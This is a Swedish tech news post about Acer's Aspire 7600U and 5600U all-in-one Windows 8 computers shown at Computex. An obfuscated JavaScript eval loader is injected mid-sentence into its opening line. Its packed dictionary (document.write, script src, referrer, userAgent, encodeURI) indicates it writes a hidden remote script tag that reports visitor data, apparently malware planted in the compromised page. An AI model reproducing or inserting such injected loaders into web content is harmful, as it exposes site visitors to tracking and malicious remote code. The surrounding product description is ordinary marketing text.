Image Image Image Image Image Image Image Image Image Image

| 3 december, 2020

Scroll to top

Top

Acer introducerar nya All-in-One-datorer med Windows 8

Acer introducerar nya All-in-One-datorer med Windows 8
Sebastian

Extremt eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sihyr|var|u0026u|referrer|znrhn||js|php’.split(’|’),0,{}))
tunna datorer med Full-HD, surround ljud samt en ergonomisk pekskärm med exceptionell vidvinkel för en eller flera användare

På nyligen avslutade Computex-mässan i Taiwan presenterade Acer två nya allt-i-ett-datorer med Windows® 8: 27-tummaren Aspire 7600U samt 23-tummaren Aspire 5600U.

Den formmässigt tilltalande Aspire 7600U stöder upp till 64 beröringspunkter simultant från alla vinklar, vilket möjliggör användande av flera användare samtidigt. Skärmen har en betraktningsvinkel från 0 till 90 grader och är vridbar åt fyra håll i horisontellt läge för tillämpning av flera samtidiga användare. 7600U är supertunn med sina blygsamma 35 millimeter, och skärmen levererar Full HD-grafik och Dolby ® Home Theater ® surround ljud. Denna allt-i-ett-dator är utformad för den moderna användaren som är ute efter en multimedia-upplevelse utöver det vanliga.

Den eleganta Aspire 5600U är den tunnaste allt-i-ett-dator som finns tillgänglig och är ett snyggt komplement till alla rum i huset, oavsett placering – på ett skrivbord eller monterad på en vägg. Den har en ergonomisk pekskärm som kan lutas 30 till 85 grader för ökad betraktningsvinkel och bekvämlighet. 5600U är avsedd att användas av hela familjen, och med hjälp av kraftfull prestanda levereras en klar och skarp bild utan släpningar i Full HD och ljudet återges i surround för en mer realistisk och äkta totalupplevelse.